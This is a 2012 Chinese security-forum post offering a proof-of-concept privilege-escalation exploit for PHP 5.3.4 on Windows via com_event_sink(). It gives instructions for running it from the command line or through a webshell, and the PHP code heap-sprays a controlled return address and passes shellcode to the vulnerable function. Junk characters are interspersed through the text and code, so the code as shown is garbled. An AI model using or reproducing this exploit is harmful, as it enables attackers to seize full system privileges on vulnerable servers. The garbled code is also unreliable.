找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2273|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中6 D9 s1 T( R6 {+ X

$ s- u1 d$ T9 [; w: v) {测试方法如下:cmd /c x:\php\php.exe x:\test.php1 y2 I4 i; N6 I! [+ q) O
) B2 V7 ?, @( f
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php( u1 w1 g( _( y; n( H" b
这里是两个测试的截图:
; F, m7 p4 t* d/ T. m3 A( }  X5 U2 ~( \. v% M5 i# a/ W( L
0 X) I; u' k* ]1 S2 Z0 `

! ?' k) t7 l& Z  r/ {
& e+ X3 H* Y7 c& |0 o9 r6 a7 b  w, e9 {3 A3 S
成功利用此漏洞的攻击者将获得系统的最高权限0 K! B& N& E' b7 }

4 P) f1 J, c' L; i6 I# Z. Z+ Z* k! f4 S9 }
; ^/ F  B0 T- C" s

9 m' u5 Q! r/ K  n- \
; i9 o. F4 K5 A$ c关于漏洞分析稍后附上。一下是PoC代码:# S9 `) V7 l2 S3 V

3 x: F! U9 E! d1 `<?php
7 X% l4 N2 k/ G  d5 k' w5 P! ]//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
1 W  e8 o0 i/ ]$ e2 ]: h//$eip ="\x44\x43\x42\x41";
, U1 Y; z# G' Z) G! s9 ?$eip= "\x4b\xe8\x57\x78";
& z0 [6 B1 C6 Z  E6 ~. r$eax ="\x80\x01\x8d\x04";7 d' t0 A, s! }' K9 X# H, f: Z
$deodrant="";
  m) `# @& s; p" G: z) d$axespray = str_repeat($eip.$eax,0x80);: E2 R& T9 D/ P4 J* L
//048d0190! }0 w& J8 ^' z+ i3 J
echo strlen($axespray);
4 A0 j/ }( k" Fecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";% _! I' B; }, o) @& h3 y" P% \
echo "Silic Group Hacker Army - BlackBap.Org";
1 T0 w+ D. y3 E0 I$ b//19200 ==4B32 4b00
* P1 g% P8 R0 C5 v. J  K" x/ Tfor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
% A% ]6 V. k; @( C( r, M. a$ w1 T* ~$terminate = "T";
9 W) o: t  h5 _: n5 F! ^$ l# O$u[] =$deodrant;; T7 j" A4 Y. e" a  U: x+ J! D& X
$r[] =$deodrant.$terminate;5 ]- `4 Z# S$ n- m7 Z
$a[] =$deodrant.$terminate;! v8 _) Z; y5 a/ ~
$s[] =$deodrant.$terminate;
$ R+ C3 ^: p) [4 p# i* V+ @; H//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
) t. A1 e/ Y8 |" X$ Y) ?8 M$vVar = new VARIANT(0x048d0000+180);4 f$ U1 ~" Q+ W9 E+ d7 g  g
//弹窗代码(Shellcode)
+ U; }& M5 X$ |' \1 E$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";# O7 U- p7 A+ c8 a; E5 U
$var2 = new VARIANT(0x41414242);0 }6 N6 h% @( T
com_event_sink($vVar,$var2,$buffer);/ G: C; g: S( `& ?$ t0 ^( V- U6 i7 U
?>* a( [* W7 Q8 p! R

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表